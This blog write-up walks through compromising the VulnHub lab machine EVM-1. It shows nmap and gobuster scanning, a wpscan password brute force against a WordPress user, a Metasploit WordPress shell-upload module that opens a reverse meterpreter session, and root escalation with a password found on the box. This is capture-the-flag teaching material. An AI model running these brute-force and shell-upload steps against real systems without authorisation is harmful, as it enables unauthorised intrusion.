Post

VulnHub: EVM-1

Posted
By Frosty 2 min read

Enumeration

Initially, we must discover what IP the target received from the DHCP server. We can use netdiscover to identify the IP address. From there, we perform a full port scan to identify available services. There are many ports open, so I will start with port 80 HTTP.

1
2

$ netdiscover -r 192.168.147.0/24
$ nmap -p- -sV 192.168.147.3

Image

Enumerating HTTP

Image

The home page is a default Apache landing page, although there is a hint on where we should go next, suggesting that that we look at /wordpress.

Image

When viewed, we see a Wordpress page setup, however notice that it is text only. Perhaps all the content has moved elsewhere. We can gather some small information, a potential username c0rrupt3d_brain. I say a potential username because we have not confirmed that it still exists, or that it has remained unchanged.

We can perform a gobuster scan to identify possible pages, and indeed find that the wordpress pages have a 301 redirect HTTP response.

1
2
3
4

$ gobuster dir \
    dir \
    -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
    -u http://192.168.147.3/wordpress

Image

Instead, we can use wpscan to enumerate the wordpress service. Firstly, we enumerate the users. Following this, we can use wpscan to try and brute force the password.

1
2
3
4
5
6
7
8

$ wpscan --url http://192.168.147.3/wordpress --enumerate u
[...]
[i] User(s) Identified:
[+] c0rrupt3d_brain

$ wpscan --url http://192.168.147.3/wordpress -U c0rrupt3d_brain -P /usr/share/wordlists/rockyou.txt
[...]
[SUCCESS] - c0rrupt3d_brain / 24992499

Image

Image

Initial Shell

We’ll use the metasploit framework wp_admin_shell_upload module for this and open a meterpreter session relatively easily:

1
2
3
4
5
6
7
8
9

$ msfconsole
> use exploit/unix/webapp/wp_admin_shell_upload
> show options
> set rhosts 192.168.147.3
> set targeturi /wordpress
> set username c0rrupt3d_brain
> set password 24992499
> set lhost 192.168.147.4
> exploit

Image

Image

Escalating Privileges

To start, we’ll jump into a TTY shell, which we’ll need to upgrade. We can do this with the following commands:

1
2
3
4
5

$ python -c 'import pty; pty.spawn("/bin/bash");'
$ stty raw -echo
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color

From here, privielge escalation requires some enumeration. We should check the /home directory for some interesting files. In this case we discover a /root3d directory. Within this there is a hidden file which contains the root password. To switch to the root user, we issue the $ su command, and input the identified password. This provides the root shell!

Image

Image

writeups
boot2root vulnhub
This post is licensed under CC BY 4.0 by the author.